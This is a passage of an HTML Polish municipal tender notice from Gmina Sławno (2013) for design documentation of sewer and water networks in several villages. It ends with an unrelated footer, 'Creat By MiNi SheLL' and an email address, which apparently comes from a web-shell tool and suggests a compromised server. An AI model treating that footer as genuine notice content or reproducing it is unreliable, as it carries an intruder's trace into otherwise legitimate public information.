<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz prac powierzonych podwykonawcom - Załącznik nr 3 do SIWZ.
2. Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, które zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić wyłącznie w następujących sytuacjach:
1) wprowadzanie istotnych zmian do przedmiotu zamówienia spowodowanych uwarunkowaniami formalno-prawnymi lub technicznymi, bez konieczności zwiększenia wynagrodzenia należnego Wykonawcy;
2) zmniejszenia zakresu realizacji prac projektowych - usług, w przypadku wystąpienia zmiany okoliczności powodującej że:
a) wykonanie części zakresu prac nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania umowy lub
b) wykonanie części zakresu  prac nie jest możliwe, z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy;
3) zmiany terminu wykonania umowy, w przypadku:
a) wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
b) wniesienia przez Zamawiającego istotnej zmiany, na podstawie której Wykonawca wykonuje przedmiot umowy, przez co niemożliwe jest dotrzymanie terminu o którym mowa w § 3 umowy,
c) wstrzymanie realizacji przedmiotu umowy przez Zamawiającego nie wynikające z przyczyn leżących po stronie Wykonawcy,
d) wyrażenia zgody przez Zamawiającego na skrócenia terminu realizacji,
e) wystąpienia opóźnienia w uzyskiwaniu decyzji i uzgodnień wydawanych przez inne organy w stosunku do terminów przewidzianych ustawowo lub w stosunku do innych przepisów z przyczyn nie leżących po stronie Wykonawcy,
f) wystąpienia opóźnienia w uzyskiwaniu oświadczeń właścicieli o zgodzie na dysponowanie przez gminę nieruchomością na cele budowlane, z przyczyn nie leżących po stronie Wykonawcy,
g) w sytuacji opóźnienia przez Zamawiającego przekazania danych na podstawie, których Wykonawca wykonuje dokumentację.
4) w zakresie zmiany wynagrodzenia, zwłaszcza w sytuacji zmniejszenia zakresu
realizacji prac projektowych, zmiany stawki obowiązującego podatku od towarów i usług (VAT)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug.slawno.ibip.p<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sławno, ul. M. C. Skłodowskiej 9, 76 - 100 Sławno, pok. 63.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 09:30, miejsce: Urząd Gminy w Sławnie, ul. M. C. Skłodowskiej 9, 76-100 Sławno, pok. 10 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - opracowanie kompletnej dokumentacji projektowej budowy sieci kanalizacji sanitarnej i wodociągowej w miejscowości Sławsko gm. Sławno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej budowy wraz z uzyskaniem decyzji  pozwolenia na budowę:
Zadanie nr 1 - opracowanie kompletnej dokumentacji projektowej budowy sieci kanalizacji sanitarnej i wodociągowej  w miejscowości Sławsko gm. Sławno. 
Założenia projektowe:
- długość sieci wodociągowej - ok.  5 km,
- sieć kanalizacji grawitacyjnej - ok. 5 km,
- sieć  tłoczna z dwiema pompowniami - 2,5 km.
- sieć wodociągowa zastąpi dotychczasową eksploatowaną sieć z rur azbestowych.
- instalacja kanalizacyjna i wodociągowa dla około 920 mieszkańców tj. około 170 szt. przyłączy,
- przyłącza wodociągowe zakończone izolowaną studnią wodomierzową z zestawem wodomierzowym, z podłączeniem do istniejących instalacji wewnętrznych,
- przyłącza kanalizacyjne zakończone studzienką kanalizacyjną z wykonaniem przyłączy tj. od studzienki do istniejących instalacji (kanalizacji sanitarnych wewnętrznych) wyprowadzonych z budynków,
- dla wszystkich działek posiadających status działki budowlanej niezabudowanej, zlokalizowanych wzdłuż projektowanej sieci, projekt sieci wodociągowej i kanalizacyjnej  powinien uwzględniać budowę przyłączy w granicach pasa drogowego,
- dokumentacja winna zawierać projekty odejść od sieci głównej zakończonych studnią w pasy ulic poprzecznych,
- ścieki należy odprowadzić instalacją tłoczną do oczyszczalni ścieków w Sławnie przy ul. Ogrodowej 1 do istniejącej studni  kanalizacyjnej przy wjeździe na oczyszczalnię,
- przyjęte przekroje projektowanych rurociągów obu sieci powinny zapewnić odbiór ścieków i dostarczanie odpowiedniej ilości wody z uwzględnieniem przyrostu liczby mieszkańców na terenach, które zgodnie z obowiązującym Miejscowym Planem Zagospodarowania Przestrzennego gm. Sławno przeznaczone są na cele rolne, a w Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Sławno przeznaczone są pod zabudowę mieszkaniową. W 2013 roku gmina Sławno przystąpi do zmiany planu miejscowego dla tych terenów. 
Miejscowość Sławsko objęta jest strefą ochrony krajobrazu kulturowego. Zakres strefy przedstawia załącznik graficzny nr 1 z MPZP miejscowości Sławsko Gmina Sławno.
Dolina rzeki Wieprzy część wsi Sławsko pomiędzy drogą powiatową a rz. Wieprzą to teren obszaru Natura 2000, Dolina Wieprzy i Studnicy - kod obszaru PLH 220038.
Mapa ze Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Sławno stanowi załącznik graficzny nr 2 do SIWZ.
Obszar objęty projektem przedstawia załącznik graficzny nr 3 do SIWZ.
UWAGA: Podane powyżej długości sieci oraz ilość gospodarstw są orientacyjne i mają na celu zobrazowanie skali projektowanego zadania.
W celu właściwego rozpoznania skali trudności zadania niezbędna jest wizja terenowa wykonawcy przed złożeniem oferty. 
Szczegółowe założenia techniczne  do projektu budowy sieci zawarte są w załączniku nr 8 do SIWZ - Wytyczne szczegółowe do projektu budowy sieci kanalizacji sanitarnej i wodociągowej w Sławsku.
II. Zakres przedmiotu zamówienia dla Zadania Nr 1 obejmuje: 
1) Opracowanie  map do celów projektowych w niezbędnym zakresie.
2) Ustalenie stanu własności działek objętych opracowaniem wraz z uzyskaniem zgody właścicieli na dysponowanie nieruchomością na cele budowlane.
3) Wykonanie projektu wstępnego.
4) Wykonanie projektu budowlano-wykonawczego - zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 03.07.2003 r. oraz Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji  technicznych wykonania i odbioru  robót budowlanych oraz programu funkcjonalno -użytkowego, obejmującego:
a) niezbędne projekty instalacyjno-technologiczne;
b) przebudowę infrastruktury kolidującej;
c) uwzględnienie istniejącego systemu wodociągowego i drenarskiego na obszarze objętym projektem;
d) niezbędne  projekty konstrukcyjne;
e) określenie wielkości zakresu robót związanych z odbudową dróg, zgodnie                        z warunkami technicznymi, które należy uzyskać od zarządcy dróg - powiatowych i gminnych;
f) uzgodnienie z właścicielami, zarządcami działek bezkolizyjnego prowadzenia sieci oraz uzyskanie zgody od właścicieli nieruchomości na realizację planowanego przedsięwzięcia w formie umowy cywilno-prawnej - służebności przesyłu po uprzednim ustaleniu przebiegu sieci i przyłącza na mapie stanowiącej załącznik  graficznym  do umowy;
g) nawiązanie swojego opracowania do istniejącej hydroforni i warunków technicznych zamawiającego
h) uzgodnienie opracowanej dokumentacji z zamawiającym oraz innymi instytucjami wymaganymi obowiązującym prawem.
Ilość egz. dokumentów: 6 kompletów + 1 egz. w wersji elektronicznej w formie pdf i dwg lub kompatybilnej.
5) Wykonanie przedmiarów robót z wydzieleniem kosztów kwalifikowanych                                    i niekwalifikowanych - zgodnie z regulaminem konkursu Programu Operacyjnego Infrastruktura i Środowisko. 
Za wydatki kwalifikowane w zakresie budowy sieci kanalizacji sanitarnej lub wodociągowej mogą być uznane wydatki poniesione w opisanym poniżej zakresie:
a) budowa kanalizacji sanitarnej:
- w przypadku braku studzienki w granicach nieruchomości przyłączanej, za kwalifikowane mogą być uznane wydatki poniesione na budowę przewodów kanalizacyjnych zlokalizowanych poza granicami tej nieruchomości, natomiast w granicach nieruchomości przyłączanej tylko te odcinki, które służą do przyłączenia więcej niż jednego podmiotu;
- w przypadku, gdy w granicach nieruchomości przyłączanej do sieci zlokalizowana jest studzienka (lub przewidziano jej wybudowanie), za kwalifikowane mogą być uznane wydatki poniesione na budowę przewodów zlokalizowanych zarówno poza granicami tej nieruchomości, jak również w jej granicach, jednak nie dalej, niż do pierwszej studzienki (wraz ze studzienką) od strony granicy tej nieruchomości;
b) budowa sieci wodociągowej:
- w tym przypadku za wydatki kwalifikowane mogą być uznane wydatki poniesione na budowę przewodów zlokalizowanych poza granicami nieruchomości przyłączanej,  a w granicach nieruchomości przyłączanej tylko te odcinki, które służą do przyłączenia więcej niż jednego podmiotu. 
Zamawiający zaleca projektowanie w jak największym zakresie przyłączy służących do podłączenia więcej niż jednego budynku.
Ilość egz. dokumentów: 2 egz. + 1 egz. w  wersji  elektronicznej zapisanej  w  formie pdf oraz ath lub kompatybilnej.
6) Wykonanie kosztorysów inwestorskich z wydzieleniem kosztów kwalifikowanych i niekwalifikowanych - zgodnie z regulaminem konkursu Programu Operacyjnego Infrastruktura i Środowisko, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego.
Ilość egz. dokumentów:  2 egz.+1 egz. w wersji elektronicznej zapisanej w  formie pdf oraz ath lub kompatybilnej.
7) Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Ilość egzemplarzy -1 egz.+1 egz. zapisany w wersji elektronicznej w formie pdf.
8) Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia  (BIOZ) zgodnie  z Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.
Ilość egzemplarzy - 1 egz. + 1 egz. zapisany w wersji elektronicznej w formie pdf).
9) Wykonanie dokumentacji geotechnicznej na potrzeby realizacji projektu.
10) Uzyskanie innych niezbędnych materiałów i uzgodnień w tym decyzji o środowiskowych  uwarunkowaniach.
11) Po zatwierdzeniu przez zamawiającego projektów budowlano-wykonawczych złożenie   w jego imieniu wniosku o wydanie pozwolenia na budowę oraz uzyskanie decyzji.
12) W ramach wynagrodzenia, o którym mowa w §4 projektu  umowy, Wykonawca będzie  prowadził nadzór  autorski na zasadach określonych w §14 projektu umowy.
Na każdym etapie prac Zamawiający zastrzega sobie prawo do wglądu i akceptacji opracowanego projektu budowlano-wykonawczego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - opracowanie dokumentacji projektowej rozbudowy sieci wodociągowej  w m. Warszkowo, Łętowo, Wrześnica gm. Sławno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej budowy wraz z uzyskaniem decyzji  pozwolenia na budowę: 
Zadanie nr 2 - opracowanie dokumentacji projektowej rozbudowy sieci wodociągowej  w m. Warszkowo, Łętowo, Wrześnica gm. Sławno.
Zadanie polega na wykonaniu dokumentacji projektowej rozbudowy sieci wodociągowej:
1) w miejscowości Warszkowo - około 900 m, 7 szt. przyłączy z zestawami wodomierzowymi (w pomieszczeniu technicznym odbiorcy) z przejściem pod torami PKP,
2) w miejscowości Wrześnica	 - około 350 m, 
3) w miejscowości Łętowo - około 650 m. 
Dla każdej z miejscowości wymagane jest oddzielne kompletne opracowanie z odrębnymi decyzjami pozwolenia na budowę i odrębne wyceny opracowania przedmiotowej dokumentacji projektowej.
1. Dla działek zabudowach przyłącza wodociągowe winny być zakończone izolowaną studnią wodomierzową z zestawem wodomierzowym, z podłączeniem do istniejącej instalacji wewnętrznej.
2. Dla działek budowlanych i rekreacyjnych niezabudowanych zlokalizowanych wzdłuż projektowanej sieci projekt sieci wodociągowej powinien uwzględniać budowę przyłączy do granicy pasa drogowego.
II. Zakres przedmiotu zamówienia  dla Zadania Nr 2 obejmuje: 
1) Opracowanie  map do celów projektowych w niezbędnym zakresie.
2) Ustalenie stanu własności działek objętych opracowaniem wraz z uzyskaniem zgody właścicieli na dysponowanie nieruchomością na cele budowlane.
3) Wykonanie projektu wstępnego.
4) Wykonanie projektu budowlano-wykonawczego - zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 03.07.2003 r. oraz Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji  technicznych wykonania i odbioru  robót budowlanych oraz programu funkcjonalno -użytkowego, obejmującego:
a) niezbędne projekty instalacyjno-technologiczne;
b) przebudowę infrastruktury kolidującej;
c) uwzględnienie istniejącego systemu wodociągowego i drenarskiego na obszarze objętym projektem;
d) niezbędne  projekty konstrukcyjne;
e) określenie wielkości zakresu robót związanych z odbudową dróg, zgodnie                        z warunkami technicznymi, które należy uzyskać od zarządcy dróg - powiatowych i gminnych;
f) uzgodnienie z właścicielami, zarządcami działek bezkolizyjnego prowadzenia sieci oraz uzyskanie zgody od właścicieli nieruchomości na realizację planowanego przedsięwzięcia w formie umowy cywilno-prawnej - służebności przesyłu po uprzednim ustaleniu przebiegu sieci i przyłącza na mapie stanowiącej załącznik  graficznym  do umowy;
g) nawiązanie swojego opracowania do istniejącej hydroforni i warunków technicznych zamawiającego;
h) uzgodnienie opracowanej dokumentacji z zamawiającym oraz innymi instytucjami wymaganymi obowiązującym prawem.
Ilość egz. dokumentów:  6 kompletów + 1 egz. w wersji elektronicznej w formie pdf i dwg lub kompatybilnej.
5) Wykonanie przedmiarów robót.
Ilość egz. dokumentów:  2 egz. + 1 egz. w  wersji  elektronicznej zapisanej  w  formie pdf oraz ath lub kompatybilnej.
6) Wykonanie kosztorysów inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego.
Ilość egz. dokumentów:  2 egz. + 1 egz. w wersji elektronicznej zapisanej w  formie pdf oraz ath lub kompatybilnej.
7) Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Ilość egz. dokumentów:  1 egz.+1 egz. zapisany w wersji elektronicznej w formie pdf.
8) Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia  (BIOZ) zgodnie  z Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. w sprawie bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.
Ilość egz. dokumentów:  1 egz. + 1 egz. zapisany w wersji elektronicznej w formie pdf.
9) Wykonanie dokumentacji geotechnicznej na potrzeby realizacji projektu.
10) Uzyskanie innych niezbędnych materiałów i uzgodnień w tym decyzji o środowiskowych  uwarunkowaniach. 
11) Po zatwierdzeniu przez zamawiającego projektów budowlano-wykonawczych złożenie w jego imieniu wniosku o wydanie pozwolenia na budowę oraz uzyskanie decyzji.
12) W ramach wynagrodzenia, o którym mowa w §4 projektu umowy, Wykonawca będzie  prowadził nadzór  autorski na zasadach określonych w §14 projektu umowy.
13) Na każdym etapie prac Zamawiający zastrzega sobie prawo do wglądu i akceptacji opracowanego projektu budowlano-wykonawczego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com